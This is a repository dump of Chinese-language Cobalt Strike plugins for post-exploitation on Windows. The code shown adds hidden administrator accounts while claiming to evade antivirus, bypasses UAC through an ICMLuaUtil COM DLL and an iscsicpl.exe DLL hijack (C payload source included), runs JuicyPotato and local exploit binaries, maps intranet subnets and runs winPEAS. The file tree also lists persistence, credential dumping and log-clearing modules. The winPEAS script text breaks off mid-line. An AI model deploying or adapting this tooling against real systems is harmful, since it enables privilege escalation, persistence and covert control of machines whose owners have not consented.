├── README.md ├── adduser ├── README.md ├── adduser.cna ├── image │ ├── 1.png │ ├── 2.png │ ├── Sucess.png │ ├── failed.png │ └── show_text.png └── modules │ ├── adduser.cs │ ├── adduser.exe │ └── adduser.ps1 ├── bypassUAC ├── README.md ├── bypassuac.cna ├── dll │ ├── x64 │ │ └── combypass.dll │ └── x86 │ │ ├── combypass.dll │ │ ├── isciexe.c │ │ ├── iscsiexe.dll │ │ └── iscsiexe_org.dll └── img │ ├── 1.png │ ├── 2.png │ ├── iscsiexe1.png │ ├── iscsiexe2.png │ ├── iscsiexe3.png │ └── iscsiexe4.png ├── info ├── JuicyPotato.exe ├── README.md ├── images │ ├── beaconfailed.png │ ├── image.png │ ├── img.png │ ├── information.png │ ├── iproute.png │ ├── iproute2.png │ ├── potato.png │ ├── potato2.png │ ├── potatodel.png │ ├── setpath.png │ └── winexp.png ├── modules │ └── route.ps1 ├── statistics.cna └── winPEAS.bat ├── lsassdump ├── README.md ├── dump.cna └── img │ ├── dcsync.png │ ├── editpasswd.png │ ├── map.png │ ├── minidump.png │ ├── ntdsutid.png │ ├── regdump.png │ ├── setntlm.png │ └── vssadmin.png ├── powerview_cs ├── PowerView_master.ps1 ├── PowerViewv3.0.ps1 ├── README.md ├── img │ ├── 1.png │ ├── 2.png │ ├── 3.png │ ├── 4.png │ ├── 5.png │ ├── 6.png │ ├── 7.jpg │ └── help.png └── powerview.cna ├── powerview常用 ├── 2008.png ├── 2008_query.cna ├── 2012_query.cna ├── AD.dll ├── Powerview.ps1 ├── README.md └── one.jpg ├── 上线提醒 ├── 1.png ├── 2.png ├── load.cna ├── plus.py └── readme.md ├── 代理 ├── NatSocks.x64.exe ├── NatSocks.x86.exe ├── README.md ├── default.cna ├── frpc.exe ├── frpc.ini ├── frps.exe ├── frps.ini └── img │ ├── frp.png │ ├── frp2.png │ ├── natsocks.png │ └── natsocks2.png ├── 取证 ├── README.md ├── img │ └── recentquery.png ├── openfilehistory.exe └── qz.cna ├── 杀毒检测 ├── README.md ├── av_query.png ├── check.cnf ├── check.ps1 ├── check.py ├── list.txt ├── process_check.cna ├── process_check.png └── xiaobaicheck.png ├── 权限维持 ├── ConsoleApp1.cs ├── README.md ├── addtask.exe ├── img │ ├── CacheTask │ │ ├── CacheTask.gif │ │ ├── CacheTask.png │ │ └── CacheTask2.png │ ├── SunloginClient │ │ └── SunloginClient.png │ ├── WmiPrvSE │ │ ├── 2008.png │ │ └── 7.png │ ├── javarun │ │ └── run.png │ ├── lnkhijack │ │ ├── 1.png │ │ └── 2.png │ ├── msdtc │ │ ├── msdtc.png │ │ └── msdtc2.png │ ├── rid │ │ ├── 0.png │ │ ├── 1.png │ │ ├── 2.png │ │ ├── 4.png │ │ └── 6.png │ ├── schtasks │ │ ├── 1.png │ │ ├── 2.png │ │ └── 3.png │ ├── service │ │ ├── Servicebeacon.png │ │ └── system_beacon.png │ ├── tokenrun │ │ ├── 1.png │ │ └── 2.png │ └── userAccountControl │ │ ├── 1.png │ │ ├── 2.png │ │ ├── 3.png │ │ └── 4.png ├── ridhijack.ps1 ├── ridquery.ps1 ├── service_c2.cna ├── svchost.exe ├── systemcmd_cs.cs └── systemcmd_cs.exe └── 痕迹清除 ├── README.md ├── clear.cna └── img ├── evtxclear.png ├── powershellclear.png └── rdpclear.png /README.md: -------------------------------------------------------------------------------- 1 | # csplugin 2 | 自己开的cs插件 3 | -------------------------------------------------------------------------------- /adduser/README.md: -------------------------------------------------------------------------------- 1 | ## bypass AV add user ## 2 | * bypass AV adduser(powershell) 3 | * bypass AV adduser(C#) 4 | ### bypass AV adduser(powershell) ### 5 | ![](image/show_text.png) 6 | 7 | ![](image/Sucess.png) 8 | 9 | ![](image/failed.png) 10 | 11 | ### bypass AV adduser(C#) ### 12 | ![](image/1.png) 13 | ![](image/2.png) 14 | -------------------------------------------------------------------------------- /adduser/adduser.cna: -------------------------------------------------------------------------------- 1 | sub Adduser{ 2 | bpowershell_import($bid, getFileProper(script_resource("modules"), "adduser.ps1")); 3 | bpowerpick($bid, "AddUser "."\"$3['username']\" "."\"$3['password']\""); 4 | } 5 | 6 | popup beacon_bottom{ 7 | menu "&API添加用户"{ 8 | item "bypass Av Add User(powershell)" { 9 | $bid = $1; 10 | $add = dialog("AddUser", %(username => "admin", password => "admin123456", bid => $bid), &Adduser); 11 | dialog_description($add, "绕过杀软进行添加用户\n条件:拥有Administrator权限"); 12 | 13 | drow_text($add, "username", "Username:"); 14 | drow_text($add, "password", "Password:"); 15 | dbutton_action($add, "Run"); 16 | dialog_show($add); 17 | } 18 | 19 | item "bypass Av Add User(.NET assembly Load)"{ 20 | $bid = $1; 21 | foreach $id ($bid){ 22 | bexecute_assembly($id, getFileProper(script_resource("modules"), "adduser.exe"), ""); 23 | } 24 | } 25 | } 26 | } 27 | -------------------------------------------------------------------------------- /adduser/image/1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jiushill/csplugin/59f4484bc3f0867cf3f73da683e384b417115f0d/adduser/image/1.png -------------------------------------------------------------------------------- /adduser/image/2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jiushill/csplugin/59f4484bc3f0867cf3f73da683e384b417115f0d/adduser/image/2.png -------------------------------------------------------------------------------- /adduser/image/Sucess.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jiushill/csplugin/59f4484bc3f0867cf3f73da683e384b417115f0d/adduser/image/Sucess.png -------------------------------------------------------------------------------- /adduser/image/failed.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jiushill/csplugin/59f4484bc3f0867cf3f73da683e384b417115f0d/adduser/image/failed.png -------------------------------------------------------------------------------- /adduser/image/show_text.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jiushill/csplugin/59f4484bc3f0867cf3f73da683e384b417115f0d/adduser/image/show_text.png -------------------------------------------------------------------------------- /adduser/modules/adduser.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Collections.Generic; 3 | using System.Linq; 4 | using System.Text; 5 | using System.DirectoryServices; 6 | using System.Threading.Tasks; 7 | 8 | 9 | namespace adduser 10 | { 11 | class Program 12 | { 13 | static void Main(string[] args) 14 | { 15 | try 16 | { 17 | var net = new DirectoryEntry("WinNT://" + Environment.MachineName); 18 | var users = net.Children.Add("test", "User"); 19 | users.Invoke("SetPassword", "Hxc123456!"); 20 | users.Invoke("Put", "UserFlags", 66049); 21 | users.CommitChanges(); 22 | Console.WriteLine("[+] 添加用户成功"); 23 | var group = net.Children.Find("Administrators", "group"); 24 | if (group.Name != "") 25 | { 26 | try 27 | { 28 | group.Invoke("Add", users.Path.ToString()); 29 | Console.WriteLine("[+] 添加用户组成功"); 30 | Console.WriteLine("Username:test Password:Hxc123456!"); 31 | } 32 | catch 33 | { 34 | Console.WriteLine("[-] 添加用户组失败"); 35 | } 36 | } 37 | else 38 | { 39 | Console.WriteLine("[-] 无此用户组"); 40 | } 41 | } 42 | catch 43 | { 44 | Console.WriteLine("[-] 添加用户失败"); 45 | } 46 | } 47 | } 48 | } -------------------------------------------------------------------------------- /adduser/modules/adduser.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jiushill/csplugin/59f4484bc3f0867cf3f73da683e384b417115f0d/adduser/modules/adduser.exe -------------------------------------------------------------------------------- /adduser/modules/adduser.ps1: -------------------------------------------------------------------------------- 1 | function AddUser($username,$password){ 2 | if(([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole] "Administrator")){ 3 | $computer=Get-WMIObject Win32_ComputerSystem 4 | $computername = $computer.name 5 | $username = $username 6 | $password = $password 7 | $desc = 'Local admin account' 8 | $computer = [ADSI]"WinNT://$computername,computer" 9 | $user = $computer.Create("user", $username) 10 | $user.SetPassword($password) 11 | $user.Setinfo() 12 | $user.description = $desc 13 | $user.setinfo() 14 | $user.UserFlags = 65536 15 | $user.SetInfo() 16 | $group = [ADSI]("WinNT://$computername/administrators,group") 17 | $group.add("WinNT://$username,user") 18 | $dc=Get-WmiObject -Class Win32_UserAccount | find ": $username" 19 | if($dc.Length -eq 0){ 20 | Write-Host "[-] Add user:$username failed" 21 | }else{ 22 | Write-Host "[+] Add user:$username Sucess" 23 | net user $username 24 | } 25 | }else{ 26 | Write-Host "[-] Not Administrator power" 27 | } 28 | } -------------------------------------------------------------------------------- /bypassUAC/README.md: -------------------------------------------------------------------------------- 1 | ## bypassUC ## 2 | * ICMLuaUtil::ShellExec Bypassuac 3 | * iscsiexeBypassUac 4 | 5 | ### ICMLuaUtil::ShellExec Bypassuac ### 6 | 参考链接:https://y4er.com/post/bypassuac-with-icmluautil/ 7 | ![](img/1.png) 8 | ![](img/2.png) 9 | 10 | 如果执行没反应,检查终端是否出现:Opened: Scripts with no remove listener,如果有,重新连接cs即可解决 11 | 12 | ### iscsiexeBypassUac ## 13 | ![](img/iscsiexe1.png) 14 | ![](img/iscsiexe2.png) 15 | ![](img/iscsiexe3.png) 16 | ![](img/iscsiexe4.png) 17 | -------------------------------------------------------------------------------- /bypassUAC/bypassuac.cna: -------------------------------------------------------------------------------- 1 | sub combypassuac_{ 2 | if (-is64 $3['bid']){ 3 | blog($3['bid'], "The Beacon Arch:x64"); 4 | $dllpath = script_resource("dll/x64/combypass.dll"); 5 | }else{ 6 | blog($3['bid'], "The Beacon Arch:x86"); 7 | $dllpath = script_resource("dll/x86/combypass.dll"); 8 | } 9 | 10 | btask($3['bid'], "Type: Elevated COM interface"); 11 | btask($3['bid'], "Method: ICMLuaUtil"); 12 | bupload($3['bid'], $dllpath); 13 | bshell($3['bid'], "rundll32 combypass.dll,MyBypassUAC $3['executepath']"); 14 | brm($3['bid'], "combypass.dll"); 15 | } 16 | 17 | sub combypassuac{ 18 | foreach $id ($bid){ 19 | $dialog = dialog("COM DLL Bypassuc", %(executepath => "C:\\Windows\\System32\\cmd.exe", bid => $id), &combypassuac_); 20 | dialog_description($dialog, "combypassuac #指定一个要运行的PE文件"); 21 | drow_text($dialog, "executepath", "executepath:"); 22 | dbutton_action($dialog, "run"); 23 | dialog_show($dialog); 24 | } 25 | } 26 | 27 | sub iscsicplexebypassuac_{ 28 | foreach $id ($bid){ 29 | bshell($id, "reg add HKEY_CURRENT_USER\\Environment /v Path /d $3['Path'] /F"); 30 | bcd($id, $3['Path']); 31 | bupload($id, script_resource("dll/x86/iscsiexe.dll")); 32 | bupload($id, script_resource("dll/x86/iscsiexe_org.dll")); 33 | } 34 | } 35 | 36 | sub iscsicplexebypassuac{ 37 | $dialog = dialog("iscsicpl.exe ByPassUac", %(Path => "C:\\Users\\Public", bid => $bid), &iscsicplexebypassuac_); 38 | dialog_description($dialog, "c:\\Windows\\syswow64\\iscsicpl.exe缺少iscsiexe.dll和iscsiexe_org.dll"); 39 | drow_text($dialog, "Path", "Path:"); 40 | dbutton_action($dialog, "run"); 41 | dialog_show($dialog); 42 | } 43 | 44 | sub iscsicplexebypassuacrun{ 45 | foreach $id ($bid){ 46 | bshell($id, "c:\\windows\\syswow64\\iscsicpl.exe c=$3['Command']"); 47 | } 48 | } 49 | 50 | sub iscsicplexebypassuacdel_{ 51 | foreach $id ($bid){ 52 | bcd($id, $3['Path']); 53 | brm($id, "$3['Path']\\iscsiexe.dll"); 54 | brm($id, "$3['Path']\\iscsiexe_org.dll"); 55 | } 56 | 57 | } 58 | 59 | sub iscsicplexebypassuac2{ 60 | $dialog = dialog("iscsicpl.exe ByPassUac", %(Command => "C:\\Windows\\System32\\cmd.exe", bid => $bid), &iscsicplexebypassuacrun); 61 | dialog_description($dialog, "c:\\windows\\syswow64\\iscsicpl.exe c="); 62 | drow_text($dialog, "Command", "Command:"); 63 | dbutton_action($dialog, "run"); 64 | dialog_show($dialog); 65 | } 66 | 67 | sub iscsicplexebypassuacdel{ 68 | $dialog = dialog("iscsicpl.exe ByPassUac", %(Path => "C:\\Users\\Public", bid => $bid), &iscsicplexebypassuacdel_); 69 | dialog_description($dialog, "删除上传的DLL"); 70 | drow_text($dialog, "Path", "Path:"); 71 | dbutton_action($dialog, "run"); 72 | dialog_show($dialog); 73 | } 74 | 75 | 76 | popup beacon_bottom{ 77 | menu "&bypassuac"{ 78 | item "&Elevated COM Bypassuc"{ 79 | $bid = $1; 80 | combypassuac($bid); 81 | } 82 | 83 | menu "&iscsicpl.exe ByPassUac"{ 84 | item "&上传dll和修改注册表"{ 85 | $bid = $1; 86 | iscsicplexebypassuac($bid); 87 | } 88 | 89 | item "&冲冲冲"{ 90 | $bid = $1; 91 | iscsicplexebypassuac2($bid); 92 | } 93 | 94 | item "&删除dll"{ 95 | $bid = $1; 96 | iscsicplexebypassuacdel($bid); 97 | } 98 | } 99 | } 100 | 101 | } 102 | 103 | 104 | -------------------------------------------------------------------------------- /bypassUAC/dll/x64/combypass.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jiushill/csplugin/59f4484bc3f0867cf3f73da683e384b417115f0d/bypassUAC/dll/x64/combypass.dll -------------------------------------------------------------------------------- /bypassUAC/dll/x86/combypass.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jiushill/csplugin/59f4484bc3f0867cf3f73da683e384b417115f0d/bypassUAC/dll/x86/combypass.dll -------------------------------------------------------------------------------- /bypassUAC/dll/x86/isciexe.c: -------------------------------------------------------------------------------- 1 | // iscsiexe.cpp, the payload DLL executed by iscsicpl.exe 2 | #include "pch.h" 3 | #include 4 | #include 5 | #include 6 | #include "resource.h" 7 | #pragma pack(1) 8 | 9 | // LoadString() for linker 10 | #pragma comment(lib,"User32.lib") 11 | 12 | #define MAX_ENV_SIZE 32767 13 | 14 | BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved) 15 | { 16 | char *commandline=NULL; 17 | char *p = NULL; 18 | char split[2] = { '=' }; 19 | char *execute=NULL; 20 | switch (ul_reason_for_call) 21 | { 22 | case DLL_PROCESS_ATTACH: 23 | commandline=GetCommandLineA(); 24 | p = strtok(commandline, split); 25 | while (p != NULL) { 26 | execute = p; 27 | p = strtok(NULL, split); 28 | } 29 | WinExec(execute,SW_SHOW); 30 | ExitProcess(0); 31 | break; 32 | case DLL_THREAD_ATTACH: 33 | case DLL_THREAD_DETACH: 34 | case DLL_PROCESS_DETACH: 35 | break; 36 | } 37 | return TRUE; 38 | } 39 | 40 | // the proxy DLL mappings for the linker 41 | #pragma comment(linker, "/export:SvchostPushServiceGlobals=iscsiexe_org.SvchostPushServiceGlobals") 42 | #pragma comment(linker, "/export:ServiceMain=iscsiexe_org.ServiceMain") 43 | #pragma comment(linker, "/export:DiscpEstablishServiceLinkage=iscsiexe_org.DiscpEstablishServiceLinkage") -------------------------------------------------------------------------------- /bypassUAC/dll/x86/iscsiexe.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jiushill/csplugin/59f4484bc3f0867cf3f73da683e384b417115f0d/bypassUAC/dll/x86/iscsiexe.dll -------------------------------------------------------------------------------- /bypassUAC/dll/x86/iscsiexe_org.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jiushill/csplugin/59f4484bc3f0867cf3f73da683e384b417115f0d/bypassUAC/dll/x86/iscsiexe_org.dll -------------------------------------------------------------------------------- /bypassUAC/img/1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jiushill/csplugin/59f4484bc3f0867cf3f73da683e384b417115f0d/bypassUAC/img/1.png -------------------------------------------------------------------------------- /bypassUAC/img/2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jiushill/csplugin/59f4484bc3f0867cf3f73da683e384b417115f0d/bypassUAC/img/2.png -------------------------------------------------------------------------------- /bypassUAC/img/iscsiexe1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jiushill/csplugin/59f4484bc3f0867cf3f73da683e384b417115f0d/bypassUAC/img/iscsiexe1.png -------------------------------------------------------------------------------- /bypassUAC/img/iscsiexe2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jiushill/csplugin/59f4484bc3f0867cf3f73da683e384b417115f0d/bypassUAC/img/iscsiexe2.png -------------------------------------------------------------------------------- /bypassUAC/img/iscsiexe3.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jiushill/csplugin/59f4484bc3f0867cf3f73da683e384b417115f0d/bypassUAC/img/iscsiexe3.png -------------------------------------------------------------------------------- /bypassUAC/img/iscsiexe4.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jiushill/csplugin/59f4484bc3f0867cf3f73da683e384b417115f0d/bypassUAC/img/iscsiexe4.png -------------------------------------------------------------------------------- /info/JuicyPotato.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jiushill/csplugin/59f4484bc3f0867cf3f73da683e384b417115f0d/info/JuicyPotato.exe -------------------------------------------------------------------------------- /info/README.md: -------------------------------------------------------------------------------- 1 | ### statistics ### 2 | 功能: 3 | * 统计在线主机和掉线主机 4 | * windows信息收集 5 | * JuicyPotato提权 6 | * 提权工具快速利用 7 | * ip route(获取内网IP段) 8 | 9 | ### 统计在线主机和掉线主机 ### 10 | ctrl+l 11 | ![](images/image.png) 12 | 13 | ![](images/beaconfailed.png) 14 | 15 | ### windows信息收集 ### 16 | ![](images/information.png) 17 | 18 | ### JuicyPotato提权 ### 19 | ![](images/potato.png) 20 | 21 | ![](images/potato2.png) 22 | 23 | ![](images/potatodel.png) 24 | 25 | ### 提权工具快速利用 ### 26 | ![](images/img.png) 27 | 28 | ![](images/setpath.png) 29 | 30 | ![](images/winexp.png) 31 | 32 | ### ip route(获取内网IP段) ### 33 | ![](images/iproute.png) 34 | 35 | ![](images/iproute2.png) 36 | -------------------------------------------------------------------------------- /info/images/beaconfailed.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jiushill/csplugin/59f4484bc3f0867cf3f73da683e384b417115f0d/info/images/beaconfailed.png -------------------------------------------------------------------------------- /info/images/image.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jiushill/csplugin/59f4484bc3f0867cf3f73da683e384b417115f0d/info/images/image.png -------------------------------------------------------------------------------- /info/images/img.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jiushill/csplugin/59f4484bc3f0867cf3f73da683e384b417115f0d/info/images/img.png -------------------------------------------------------------------------------- /info/images/information.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jiushill/csplugin/59f4484bc3f0867cf3f73da683e384b417115f0d/info/images/information.png -------------------------------------------------------------------------------- /info/images/iproute.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jiushill/csplugin/59f4484bc3f0867cf3f73da683e384b417115f0d/info/images/iproute.png -------------------------------------------------------------------------------- /info/images/iproute2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jiushill/csplugin/59f4484bc3f0867cf3f73da683e384b417115f0d/info/images/iproute2.png -------------------------------------------------------------------------------- /info/images/potato.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jiushill/csplugin/59f4484bc3f0867cf3f73da683e384b417115f0d/info/images/potato.png -------------------------------------------------------------------------------- /info/images/potato2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jiushill/csplugin/59f4484bc3f0867cf3f73da683e384b417115f0d/info/images/potato2.png -------------------------------------------------------------------------------- /info/images/potatodel.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jiushill/csplugin/59f4484bc3f0867cf3f73da683e384b417115f0d/info/images/potatodel.png -------------------------------------------------------------------------------- /info/images/setpath.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jiushill/csplugin/59f4484bc3f0867cf3f73da683e384b417115f0d/info/images/setpath.png -------------------------------------------------------------------------------- /info/images/winexp.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jiushill/csplugin/59f4484bc3f0867cf3f73da683e384b417115f0d/info/images/winexp.png -------------------------------------------------------------------------------- /info/modules/route.ps1: -------------------------------------------------------------------------------- 1 | write-host "Intranet IP segment acquisition" 2 | $regex = [regex]"\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\b" 3 | $global:ipsub=@() 4 | $global:temp=@() 5 | $global:iproute=@() 6 | $regex.Matches((route print)) | ForEach-Object{ 7 | $iplist=$_.Value.Split(".") 8 | if([int]$iplist[0] -eq 10 -and [int]$iplist[1] -le 255 -and [int]$iplist[2] -le 255 -and [int]$iplist[3] -le 255){ 9 | $ipsub += $_.Value 10 | }elseif([int]$iplist[0] -eq 192 -and [int]$iplist[1] -eq 168 -and [int]$iplist[2] -le 255 -and [int]$iplist[3] -le 255){ 11 | $ipsub += $_.Value 12 | }elseif(([int]$iplist[0] -eq 172) -and (([int]$iplist[1] -eq 16) -and ([int]$iplist[1] -le 31)) -and ([int]$iplist[2] -le 255) -and ([int]$iplist[3] -le 255)){ 13 | $ipsub += $_.Value 14 | } 15 | } 16 | $ipsub=$ipsub | sort -Unique 17 | foreach($ip in $ipsub){ 18 | $ipx=$ip.Split(".") 19 | $tmp= $ipx[0] + "." + $ipx[1] + "." + $ipx[2] 20 | if($temp -notcontains $tmp){ 21 | $temp += $tmp 22 | $iproute += $ip 23 | } 24 | } 25 | $iproute -------------------------------------------------------------------------------- /info/statistics.cna: -------------------------------------------------------------------------------- 1 | bind Ctrl+L{ 2 | $beacons = beacons(); 3 | $survive = @(); 4 | $death = @(); 5 | if (strlen($beacons) > 0){ 6 | foreach $entry ($beacons){ 7 | $alive = $entry["alive"]; 8 | $data = "ip: ".$entry["external"]." computer:".$entry["computer"]." user:".$entry["user"]." last:".$entry["last"]."s"; 9 | if($alive eq 'true'){ 10 | add($survive, $data, -1); 11 | }else{ 12 | add($death, $data, -1); 13 | } 14 | } 15 | show_message("存活主机数量:".size($survive)."\n掉线机器数量:".size($death)."\n".join("\n", $death)); 16 | } 17 | } 18 | 19 | 20 | alias winpeas{ 21 | if ($2 eq "del"){ 22 | brm($1, "winpeas.bat"); 23 | }else{ 24 | bupload($1, script_resource("winPEAS.bat")); 25 | bshell($1, "winpeas.bat"); 26 | } 27 | } 28 | 29 | alias JuicyPotato{ 30 | $args = $2; 31 | $cmd = $3; 32 | if ((strlen($args) > 0) && (strlen($cmd) > 0)){ 33 | if($2 !eq "del"){ 34 | blog($1, $args); 35 | $command ="$args "."$cmd"; 36 | bshell($1, "JuicyPotato.exe ".$command); 37 | } 38 | }else if($args eq "del"){ 39 | brm($1, "JuicyPotato.exe"); 40 | }else{ 41 | bupload($1, script_resource("JuicyPotato.exe")); 42 | bshell($1, "JuicyPotato.exe"); 43 | } 44 | } 45 | 46 | 47 | $evpath = ""; 48 | popup beacon_bottom{ 49 | item "常用提权"{ 50 | prompt_text("提权exp路径设置", "D:\\tools\\ctf\\exploit\\windows exploit\\elevated privileges\\15015\\MS15-015\\Release\\", lambda({ 51 | $evpath = "$1"; 52 | blog($ids, $evpath); 53 | }, $ids => $1)); 54 | } 55 | } 56 | 57 | alias winexp{ 58 | @files = ls($evpath); 59 | if (strlen($2) > 0){ 60 | if (((strlen($2) > 0) && (strlen($3) > 0) && (strlen($4) > 0)) || (strlen($2) > 0) && (strlen($3) > 0) || (strlen($5) > 0) || (strlen($6) > 0)){ 61 | if (($2 eq "replace") && (strlen($3) > 0)){ 62 | $command = replace($3, "@", " "); 63 | bshell($1, $command); 64 | }else if ((strlen($6) > 0)){ 65 | $command = $2." $3 $4 $5 $6"; 66 | bshell($1, $command); 67 | }else if ((strlen($5) > 0)){ 68 | $command = $2." $3 $4 $5"; 69 | bshell($1, $command); 70 | }else if ((strlen($4) > 0)){ 71 | $command = $2." $3 $4"; 72 | bshell($1, $command); 73 | }else if($3 eq "0"){ 74 | bshell($1, $2); 75 | }else{ 76 | $command = $2." $3"; 77 | bshell($1, $command); 78 | } 79 | }else{ 80 | $test = $evpath.$2; 81 | if($test in @files){ 82 | blog($1, strlen($test)." path:".$test); 83 | bupload($1, $test); 84 | bshell($1, $2); 85 | }else{ 86 | berror($1, "file: $test not found"); 87 | } 88 | } 89 | }else{ 90 | blog2($1, "beacon上的常用提权设置路径,路径结尾记得加/或\->C:\ or /root/home/") 91 | blog2($1, "winexp MS15-015.exe #上传MS15-015.exe"); 92 | blog2($1, "winexp potato.exe 0 #无参数执行exp"); 93 | blog2($1, "winexp MS15-015.exe \"whoami\" #执行exp"); 94 | blog2($1, "最多支持6个参数的exp,如果需要多个参数执行:winexp replace exp.exe@-d@1@-c@{11111111-11111111-11111111}@-p@whoami") 95 | } 96 | } 97 | 98 | alias route{ 99 | $handle = openf(script_resource("modules\\route.ps1")); 100 | $text = readb($handle, -1); 101 | closef($handle); 102 | bpowerpick($1, $text); 103 | } 104 | -------------------------------------------------------------------------------- /info/winPEAS.bat: -------------------------------------------------------------------------------- 1 | @echo off 2 | 3 | set long=no 4 | 5 | 6 | echo *((,.,/((((((((((((((((((((/, */ 7 | echo ,/*,..*(((((((((((((((((((((((((((((((((, 8 | echo ,*/((((((((((((((((((/, .*//((//**, .*((((((* 9 | echo ((((((((((((((((* *****,,,/########## .(* ,(((((( 10 | echo (((((((((((/* ******************/####### .(. (((((( 11 | echo ((((((..******************/@@@@@/***/######* /(((((( 12 | echo ,,..**********************@@@@@@@@@@(***,#### ../((((( 13 | echo , ,**********************#@@@@@#@@@@*********##((/ /(((( 14 | echo ..(((##########*********/#@@@@@@@@@/*************,,..(((( 15 | echo .(((################(/******/@@@@@#****************.. /(( 16 | echo .((########################(/************************..*( 17 | echo .((#############################(/********************.,( 18 | echo .((##################################(/***************..( 19 | echo .((######################################(************..( 20 | echo .((######(,.***.,(###################(..***(/*********..( 21 | echo .((######*(#####((##################((######/(********..( 22 | echo .((##################(/**********(################(**...( 23 | echo .(((####################/*******(###################.(((( 24 | echo .(((((############################################/ /(( 25 | echo ..(((((#########################################(..(((((. 26 | echo ....(((((#####################################( .((((((. 27 | echo ......(((((#################################( .(((((((. 28 | echo (((((((((. ,(############################(../(((((((((. 29 | echo (((((((((/, ,####################(/..((((((((((. 30 | echo (((((((((/,. ,*//////*,. ./(((((((((((. 31 | echo (((((((((((((((((((((((((((/" 32 | echo by carlospolop 33 | echo 34 | echo Advisory: winpeas should be used for authorized penetration testing and/or educational purposes only.Any misuse of this software will not be the responsibility of the author or of any other collaborator. Use it at your own networks and/or with the network owner's permission. 35 | echo 36 | echo _-_-_-_-_-_-_-_-_-_-_-_-_-_-_-^> [*] BASIC SYSTEM INFO ^<_-_-_-_-_-_-_-_-_-_-_-_-_-_-_- 37 | echo _-_-_-_-_-_-_-_-_-_-_-_-_-_-_-^> [+] WINDOWS OS ^<_-_-_-_-_-_-_-_-_-_-_-_-_-_-_- 38 | echo [i] Check for vulnerabilities for the OS version with the applied patches 39 | echo [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#kernel-exploits 40 | systeminfo 41 | echo. 42 | wmic qfe get Caption,Description,HotFixID,InstalledOn | more 43 | echo. 44 | echo. 45 | set expl=no 46 | for /f "tokens=3-9" %%a in ('systeminfo') do (echo "%%a %%b %%c %%d %%e %%f %%g" | findstr /i "2000 XP 2003 2008 vista" && set expl=yes) & (echo "%%a %%b %%c %%d %%e %%f %%g" | findstr /i /C:"windows 7" && set expl=yes) 47 | IF "%expl%" == "yes" echo [i] Possible exploits (https://github.com/codingo/OSCP-2/blob/master/Windows/WinPrivCheck.bat) 48 | IF "%expl%" == "yes" wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB2592799" 1>NUL 49 | IF "%expl%" == "yes" IF errorlevel 1 echo MS11-080 patch is NOT installed! (Vulns: XP/SP3,2K3/SP3-afd.sys) 50 | IF "%expl%" == "yes" wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB3143141" 1>NUL 51 | IF "%expl%" == "yes" IF errorlevel 1 echo MS16-032 patch is NOT installed! (Vulns: 2K8/SP1/2,Vista/SP2,7/SP1-secondary logon) 52 | IF "%expl%" == "yes" wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB2393802" 1>NUL 53 | IF "%expl%" == "yes" IF errorlevel 1 echo MS11-011 patch is NOT installed! (Vulns: XP/SP2/3,2K3/SP2,2K8/SP2,Vista/SP1/2,7/SP0-WmiTraceMessageVa) 54 | IF "%expl%" == "yes" wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB982799" 1>NUL 55 | IF "%expl%" == "yes" IF errorlevel 1 echo MS10-59 patch is NOT installed! (Vulns: 2K8,Vista,7/SP0-Chimichurri) 56 | IF "%expl%" == "yes" wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB979683" 1>NUL 57 | IF "%expl%" == "yes" IF errorlevel 1 echo MS10-21 patch is NOT installed! (Vulns: 2K/SP4,XP/SP2/3,2K3/SP2,2K8/SP2,Vista/SP0/1/2,7/SP0-Win Kernel) 58 | IF "%expl%" == "yes" wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB2305420" 1>NUL 59 | IF "%expl%" == "yes" IF errorlevel 1 echo MS10-092 patch is NOT installed! (Vulns: 2K8/SP0/1/2,Vista/SP1/2,7/SP0-Task Sched) 60 | IF "%expl%" == "yes" wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB981957" 1>NUL 61 | IF "%expl%" == "yes" IF errorlevel 1 echo MS10-073 patch is NOT installed! (Vulns: XP/SP2/3,2K3/SP2/2K8/SP2,Vista/SP1/2,7/SP0-Keyboard Layout) 62 | IF "%expl%" == "yes" wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB4013081" 1>NUL 63 | IF "%expl%" == "yes" IF errorlevel 1 echo MS17-017 patch is NOT installed! (Vulns: 2K8/SP2,Vista/SP2,7/SP1-Registry Hive Loading) 64 | IF "%expl%" == 